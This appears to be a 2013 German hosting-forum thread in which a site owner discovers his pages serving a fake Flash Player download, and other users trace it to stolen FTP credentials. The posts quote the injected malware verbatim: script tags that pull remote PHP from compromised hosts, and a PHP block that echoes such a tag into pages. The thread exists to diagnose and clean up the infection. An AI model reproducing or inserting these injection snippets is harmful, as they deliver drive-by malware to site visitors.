Trojaner?


Seite: 1 2
Autor Beitrag
Skalmar
06.12.13 - 21:22:01 Uhr

Hallo, wenn ich meine Seite und auch eine Subdomain aufrufe
http://www.crzdsgn.de/
wird mir vorgeschlagen Flash Player 14 runterzuladen.
Da ich weiß, dass es den Player in der Version 14 nicht gibt, sondern aktuell die Version 11, habe ich die Datei einfach mal bei Virustotal hochgeladen, und dort ist sie doch bei einigen angeschlagen.

Ich kann meine Seite ohne das installieren dieser vermeintlichen Software nicht aufrufen oder irgendwas tätigen. Ich habe auch keine Ahnung, wie es dazu kommen konnte, ob es an mir oder an Pytal liegt.

Edit: Ich habe grade in der Dateienliste gesehen, dass sich dort doch ein wenig was eingeschlichen hat. Ich weiß nicht woher das kommt aber ich denke, dass das Problem wohl nicht bei mir liegt.

Edit 2: Habe die Dateien vom Server gelöscht => Problem gelöst.

https://www.virustotal.com/de/file/93.../analysis/

Externes Bild: http://www.abload.de/img/unbenanntmsdbz.png

Hoffentlich meldet sich noch jemand vom Support hier, der dem ganzen nachgehen kann.
tussi
07.12.13 - 06:40:35 Uhr

Auf jeden Fall solltest du deinen PC auf Befall überprüfen. Und eventuell die Passwörter ändern. Und dann solltest du täglich überprüfen, ob die Dateien, die du gelöscht hast, wieder da sind.

Ich hatte auch mal sowas. Da habe ich auch die befallenen Dateien vom Server gelöscht und die richtigen Dateien wieder hochgeladen. Das konnte ich dann täglich machen, bis ich dahinter kam, warum die täglich verseucht waren.

Bei mir war es so, dass auf meine auf dem PC gespeicherten FTP-Passwörter zugegriffen wurde und alle Webpräsenzen verseucht wurden. Ich habe darauf mein FTP so eingestellt, dass ich die Passwörter (die ich natürlich geändert habe) nur noch manuell eingebe. Seitdem war bei mir nichts mehr.

Ach ja, ich werde deine Seite, die du oben verlinkt hast, auf keinen Fall anklicken - das Risiko, dass ich mir da was einfange, gehe ich nicht ein.
SammysHP
07.12.13 - 11:40:30 Uhr

Ich habe die Seite angeklickt, da ich Linux nutze und mein Browser nur das macht, was ich ihm sage.

Ich würde nicht nur diese Dateien löschen, sondern alles. Du weißt nämlich nicht, wie die Sachen dort hingekommen sind und ob nicht doch noch irgendwo etwas versteckt ist. Ist das http://petermccully.com/ von dir eingefügt worden?
wemaflo
08.12.13 - 11:28:02 Uhr

Da sehe ich auch noch was im Code:
</div><!--f04dc3--><script src="http://grubeos.com/docs/s7aBrMo9.php?id=56627352" type="text/javascript"></script><!--/f04dc3-->
SammysHP
08.12.13 - 11:53:32 Uhr

Gestern stand da noch "http://petermccully.com/…".
blindgrafix
11.12.13 - 15:54:17 Uhr

https://www.virustotal.com/en/url/897...386773421/
SammysHP
11.12.13 - 17:05:30 Uhr

Und heute ist es

<!--f04dc3--><script src="http://montanaangler.com/montana-fly-fishing-blog/sbsCRYwT.php?id=56627352" type="text/javascript"></script><!--/f04dc3-->

Da ist definitiv noch was nicht in Ordnung.
tussi
11.12.13 - 21:10:47 Uhr

Das ist wie bei mir damals. Die Passwörter müssen geändert werden und der Zugang über filezilla muss manuell erfolgen. Die haben mit Sicherheit die xml-Datei vom Rechner runtergeladen und dort sind alle Passwörter von filezilla drin. Und die benutzen die dann, um die Dateien mit ihrem Schei.. zu verseuchen.

Siehe dazu auch: http://blog.botfrei.de/2013/01/filezi...m-klartext

Alle Passwörter bei filezilla und pytal (und evtl. anderen Hostern) ändern, und in filezilla nur noch manuell eingeben, damit die nicht auf dem PC abgespeichert werden.

Zusätzlich den PC mit z.B: Malewarebytes und Antivirenprogramm überprüfen.

Skalmar
20.12.13 - 00:39:24 Uhr

Danke für eure Antworten, das komische ist aber, dass auf dem Gerät das ich momentan benutze überhaupt keine Seiten gespeichert sind, genauso ist mein Haupt PC seit wochen kaputt und war schon seit monaten nicht mehr online. Ich weiß nicht wie lange das schon so geht aber ja ich werde mich dran hängen und die Passwörter ändern. Vorallem, da schon wieder irgend ein scheiß aufm FTP ist.

Auf meiner Hauptseite ist seither nichts mehr drauf gekommen nur auf der Unterseite. Ich frage mich ernsthaft woher das kommt. Es ist jetzt soweit alles wieder sauber, aber ich werde in Zukunft mehr darauf achten. Danke nochmals.

Edit: Ja irgendwie müssen die nen Zugriff auf den FTP bekommen haben, vorallem da ich meine Index Datei mal gezogen habe, nachdem es immernoch aufgetaucht ist, hab ich folgendes entdeckt:

  1. <?php  
  2. #88fc9b#  
  3. if(empty($i)) {  
  4. $i "<script src=\"http://www.enabled-disaster.de/4o2DhxDX.php?id=55966836\" type=\"text/javascript\"></script>";  
  5. echo $i;  
  6. }  
  7.  
  8. #/88fc9b#  
  9. ?>  
  10. <?php  
  11.  
  12. ?>  
  13. <?php  
  14.  
  15. ?>  
  16. <?php  
  17.  
  18. ?>  


Ich bin mir ziemlich sicher, dass das nicht von mir geschrieben wurde! Außer jetzt jede einzelne Datei zu überprüfen, was kann ich denn sonst noch tun außer Passwörter ändern und Filezilla sagen er solls ned speichern? Ich arbeite zwar selber in der IT aber ich bin momentan selbst irgendwie überfragt :/

Je mehr ich mich da reinarbeite umso mehr Schaden stelle ich fest. Habe nun die Dateien von meiner Hauptseite gezogen und so gut wie in jeder Datei folgendes gefunden

<!--e4068f--><script src="http://rfhomes.ca/fgb82b0R.php?id=56627350" type="text/javascript"></script><!--/e4068f-->

sogar meine .js Dateien waren mit dem Code verseucht. Mich wunderts ja schon fast, dass die meine Stylesheets in ruhe gelassen haben
tussi
20.12.13 - 09:51:41 Uhr

Es ist gut möglich, dass schon auf deinen Haupt-PC zugegriffen wurde und dort die Passwörter geklaut wurden. Dadurch hatten die die Möglichkeit auch so auf deinen FTP-Zugang zugreifen zu können.

Nachdem du dir die "verseuchten" Dateien nun runter geladen hast, solltest du auf jeden Fall den PC überprüfen (wie schon eher von mir geschrieben).

Passwörter ändern (auch die vom Hoster) und nicht mehr in FileZilla speichern lassen, sondern manuell eingeben. So zumindest fahre ich seit damals am besten.

Manchmal kann es schon ganz hilfreich sein, sich von anderer Seite Hilfe zu holen.
Seite: 1 2

- Obige Beiträge stellen keine Äußerung oder Meinung von Pytal oder dessen Betreiber dar -